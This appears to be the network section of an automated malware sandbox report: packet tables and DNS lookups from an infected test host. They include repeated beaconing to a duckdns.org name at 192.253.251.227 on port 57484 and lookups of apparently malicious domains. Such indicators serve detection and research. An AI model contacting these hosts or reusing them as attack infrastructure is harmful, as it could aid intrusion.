Jul 26, 2024 13:03:15.465228081 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.465234041 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.465245008 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.465272903 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.472021103 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472063065 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472065926 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.472074986 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472114086 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.472153902 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472187042 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472198963 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.472207069 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472229004 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.472270012 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472307920 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472317934 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.472323895 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.472357035 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.472426891 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.545886040 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.545953035 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.546060085 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.546112061 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.546330929 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.546394110 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.546457052 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.546526909 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.547430992 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.547488928 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.547559023 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.547600985 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.547607899 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.563733101 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.563796043 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.563862085 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.563910961 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.564632893 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.564677954 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.564692020 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.564757109 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.564810991 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.565099955 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.565160036 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.565181971 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.565226078 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.565244913 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.565378904 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.565428972 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.565686941 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:16.869550943 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:16.871195078 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:16.876782894 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:47.254376888 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:47.256267071 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:47.261132956 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:04:05.766479969 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:04:06.071202993 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:04:06.773221016 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:04:08.068013906 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:04:10.470417976 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:04:15.339905977 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:04:17.595552921 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:04:17.616528034 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:04:17.621480942 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:04:24.962851048 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:04:27.446752071 CEST	49164	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:04:27.446813107 CEST	49165	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:04:33.917675972 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:04:48.049932003 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:04:48.262871981 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:04:48.262972116 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:04:48.285429001 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:04:48.290467024 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:05:19.248660088 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:05:19.251353979 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:05:19.251414061 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:05:19.252635956 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:05:19.252676010 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:05:19.253710985 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:05:19.253753901 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:05:20.367448092 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:05:20.372642040 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:05:48.672612906 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:05:48.673909903 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:05:48.678884983 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:06:19.122725010 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:06:19.125365019 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:06:19.130290985 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:06:49.511198997 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:06:49.513225079 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:06:49.521130085 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:07:19.804538965 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:07:19.804965019 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:07:19.810573101 CEST	57484	49183	192.253.251.227	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 13:02:23.419863939 CEST	54562	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:24.389543056 CEST	53	54562	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:27.699784040 CEST	52917	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:27.711153030 CEST	53	52917	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:28.752952099 CEST	62751	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:28.767771006 CEST	53	62751	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:28.769381046 CEST	57893	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:28.776680946 CEST	53	57893	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:30.099246025 CEST	54821	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:30.110009909 CEST	53	54821	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:30.112286091 CEST	54719	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:30.123723984 CEST	53	54719	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:33.903634071 CEST	49881	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:33.910928011 CEST	53	49881	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:33.912239075 CEST	54998	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:33.924249887 CEST	53	54998	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:35.667561054 CEST	52781	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:35.934151888 CEST	53	52781	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:35.936671019 CEST	63926	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:35.943998098 CEST	53	63926	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:36.743596077 CEST	65510	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:36.755584955 CEST	53	65510	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:36.756834984 CEST	62672	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:36.764659882 CEST	53	62672	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:37.722332001 CEST	56475	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:37.729845047 CEST	53	56475	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:37.731137037 CEST	49384	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:37.745031118 CEST	53	49384	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:38.521362066 CEST	54842	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:38.534807920 CEST	53	54842	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:38.536175966 CEST	58105	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:38.551383972 CEST	53	58105	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:40.219697952 CEST	64928	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:40.227581978 CEST	53	64928	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:45.813996077 CEST	57390	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:45.821501017 CEST	53	57390	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:45.829018116 CEST	58095	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:45.848612070 CEST	53	58095	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:46.629939079 CEST	54261	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:46.644884109 CEST	53	54261	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:46.647536993 CEST	60507	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:46.660887957 CEST	53	60507	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:47.766859055 CEST	50446	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:47.775124073 CEST	53	50446	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:47.776144028 CEST	55939	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:47.785279036 CEST	53	55939	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:48.605009079 CEST	49608	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:48.613313913 CEST	53	49608	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:48.614392996 CEST	61486	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:48.625840902 CEST	53	61486	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:49.456235886 CEST	62453	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:50.457890987 CEST	62453	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:51.471991062 CEST	62453	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:51.555557013 CEST	53	62453	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:53.571096897 CEST	53	62453	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:54.456157923 CEST	50568	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:02:54.464224100 CEST	53	62453	8.8.8.8	192.168.2.22
Jul 26, 2024 13:02:54.467015028 CEST	53	50568	8.8.8.8	192.168.2.22
Jul 26, 2024 13:03:01.370266914 CEST	50337	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:03:01.440237999 CEST	53	50337	8.8.8.8	192.168.2.22
Jul 26, 2024 13:03:01.440429926 CEST	50337	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:03:01.476079941 CEST	53	50337	8.8.8.8	192.168.2.22
Jul 26, 2024 13:03:13.178343058 CEST	61826	53	192.168.2.22	8.8.8.8
Jul 26, 2024 13:03:13.189455986 CEST	53	61826	8.8.8.8	192.168.2.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 26, 2024 13:02:53.571178913 CEST	192.168.2.22	8.8.8.8	d024	(Port unreachable)	Destination Unreachable
Jul 26, 2024 13:02:54.464291096 CEST	192.168.2.22	8.8.8.8	d014	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 13:02:23.419863939 CEST	192.168.2.22	8.8.8.8	0x5c93	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:27.699784040 CEST	192.168.2.22	8.8.8.8	0xd42	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:28.752952099 CEST	192.168.2.22	8.8.8.8	0x23ba	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:28.769381046 CEST	192.168.2.22	8.8.8.8	0x8058	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:30.099246025 CEST	192.168.2.22	8.8.8.8	0xe85f	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:30.112286091 CEST	192.168.2.22	8.8.8.8	0x46f9	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:33.903634071 CEST	192.168.2.22	8.8.8.8	0x1100	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:33.912239075 CEST	192.168.2.22	8.8.8.8	0x2664	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:35.667561054 CEST	192.168.2.22	8.8.8.8	0xd97e	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:35.936671019 CEST	192.168.2.22	8.8.8.8	0x9c5b	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:36.743596077 CEST	192.168.2.22	8.8.8.8	0x4189	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:36.756834984 CEST	192.168.2.22	8.8.8.8	0x2383	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:37.722332001 CEST	192.168.2.22	8.8.8.8	0x1185	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:37.731137037 CEST	192.168.2.22	8.8.8.8	0x98ab	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:38.521362066 CEST	192.168.2.22	8.8.8.8	0xae0f	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:38.536175966 CEST	192.168.2.22	8.8.8.8	0x61d4	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:40.219697952 CEST	192.168.2.22	8.8.8.8	0x6571	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:45.813996077 CEST	192.168.2.22	8.8.8.8	0x7097	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:45.829018116 CEST	192.168.2.22	8.8.8.8	0x8354	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:46.629939079 CEST	192.168.2.22	8.8.8.8	0x2b70	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:46.647536993 CEST	192.168.2.22	8.8.8.8	0xc46a	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:47.766859055 CEST	192.168.2.22	8.8.8.8	0xab1f	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:47.776144028 CEST	192.168.2.22	8.8.8.8	0x6553	Standard query (0)	hq.ax	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:48.605009079 CEST	192.168.2.22	8.8.8.8	0x801e	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:48.614392996 CEST	192.168.2.22	8.8.8.8	0x192	Standard query (0)	shortify.pro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:49.456235886 CEST	192.168.2.22	8.8.8.8	0xc404	Standard query (0)	iwarsut775laudrye2.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:50.457890987 CEST	192.168.2.22	8.8.8.8	0xc404	Standard query (0)	iwarsut775laudrye2.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:51.471991062 CEST	192.168.2.22	8.8.8.8	0xc404	Standard query (0)	iwarsut775laudrye2.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:54.456157923 CEST	192.168.2.22	8.8.8.8	0x5554	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:03:01.370266914 CEST	192.168.2.22	8.8.8.8	0xcf55	Standard query (0)	asociatiatraditiimaria.ro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:03:01.440429926 CEST	192.168.2.22	8.8.8.8	0xcf55	Standard query (0)	asociatiatraditiimaria.ro	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:03:13.178343058 CEST	192.168.2.22	8.8.8.8	0xc7ee	Standard query (0)	new.quranushaiqer.org.sa	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 13:02:24.389543056 CEST	8.8.8.8	192.168.2.22	0x5c93	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:24.389543056 CEST	8.8.8.8	192.168.2.22	0x5c93	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:27.711153030 CEST	8.8.8.8	192.168.2.22	0xd42	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:27.711153030 CEST	8.8.8.8	192.168.2.22	0xd42	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:28.767771006 CEST	8.8.8.8	192.168.2.22	0x23ba	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:28.767771006 CEST	8.8.8.8	192.168.2.22	0x23ba	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:28.776680946 CEST	8.8.8.8	192.168.2.22	0x8058	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:28.776680946 CEST	8.8.8.8	192.168.2.22	0x8058	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:30.110009909 CEST	8.8.8.8	192.168.2.22	0xe85f	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:30.110009909 CEST	8.8.8.8	192.168.2.22	0xe85f	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:30.123723984 CEST	8.8.8.8	192.168.2.22	0x46f9	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:30.123723984 CEST	8.8.8.8	192.168.2.22	0x46f9	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:33.910928011 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:33.910928011 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:33.924249887 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:33.924249887 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:35.934151888 CEST	8.8.8.8	192.168.2.22	0xd97e	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:35.934151888 CEST	8.8.8.8	192.168.2.22	0xd97e	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:35.943998098 CEST	8.8.8.8	192.168.2.22	0x9c5b	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:35.943998098 CEST	8.8.8.8	192.168.2.22	0x9c5b	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:36.755584955 CEST	8.8.8.8	192.168.2.22	0x4189	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:36.755584955 CEST	8.8.8.8	192.168.2.22	0x4189	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:36.764659882 CEST	8.8.8.8	192.168.2.22	0x2383	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:36.764659882 CEST	8.8.8.8	192.168.2.22	0x2383	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:37.729845047 CEST	8.8.8.8	192.168.2.22	0x1185	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:37.729845047 CEST	8.8.8.8	192.168.2.22	0x1185	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:37.745031118 CEST	8.8.8.8	192.168.2.22	0x98ab	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:37.745031118 CEST	8.8.8.8	192.168.2.22	0x98ab	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:38.534807920 CEST	8.8.8.8	192.168.2.22	0xae0f	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:38.534807920 CEST	8.8.8.8	192.168.2.22	0xae0f	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:38.551383972 CEST	8.8.8.8	192.168.2.22	0x61d4	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:38.551383972 CEST	8.8.8.8	192.168.2.22	0x61d4	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:40.227581978 CEST	8.8.8.8	192.168.2.22	0x6571	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:40.227581978 CEST	8.8.8.8	192.168.2.22	0x6571	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:45.821501017 CEST	8.8.8.8	192.168.2.22	0x7097	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:45.821501017 CEST	8.8.8.8	192.168.2.22	0x7097	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:45.848612070 CEST	8.8.8.8	192.168.2.22	0x8354	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:45.848612070 CEST	8.8.8.8	192.168.2.22	0x8354	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:46.644884109 CEST	8.8.8.8	192.168.2.22	0x2b70	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:46.644884109 CEST	8.8.8.8	192.168.2.22	0x2b70	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:46.660887957 CEST	8.8.8.8	192.168.2.22	0xc46a	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:46.660887957 CEST	8.8.8.8	192.168.2.22	0xc46a	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:47.775124073 CEST	8.8.8.8	192.168.2.22	0xab1f	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:47.775124073 CEST	8.8.8.8	192.168.2.22	0xab1f	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:47.785279036 CEST	8.8.8.8	192.168.2.22	0x6553	No error (0)	hq.ax		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:47.785279036 CEST	8.8.8.8	192.168.2.22	0x6553	No error (0)	hq.ax		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:48.613313913 CEST	8.8.8.8	192.168.2.22	0x801e	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:48.613313913 CEST	8.8.8.8	192.168.2.22	0x801e	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:48.625840902 CEST	8.8.8.8	192.168.2.22	0x192	No error (0)	shortify.pro		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:48.625840902 CEST	8.8.8.8	192.168.2.22	0x192	No error (0)	shortify.pro		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:51.555557013 CEST	8.8.8.8	192.168.2.22	0xc404	No error (0)	iwarsut775laudrye2.duckdns.org		192.253.251.227	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:53.571096897 CEST	8.8.8.8	192.168.2.22	0xc404	No error (0)	iwarsut775laudrye2.duckdns.org		192.253.251.227	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:54.464224100 CEST	8.8.8.8	192.168.2.22	0xc404	Server failure (2)	iwarsut775laudrye2.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:54.467015028 CEST	8.8.8.8	192.168.2.22	0x5554	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:57.283484936 CEST	8.8.8.8	192.168.2.22	0xe57a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:02:57.283484936 CEST	8.8.8.8	192.168.2.22	0xe57a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:03:01.440237999 CEST	8.8.8.8	192.168.2.22	0xcf55	No error (0)	asociatiatraditiimaria.ro		93.113.54.56	A (IP address)	IN (0x0001)	false
Jul 26, 2024 13:03:01.476079941 CEST	8.8.8.8	192.168.2.22	0xcf55	No error (0)	asociatiatraditiimaria.ro		93.113.54.56	A (IP address)	IN (0x0001)	false
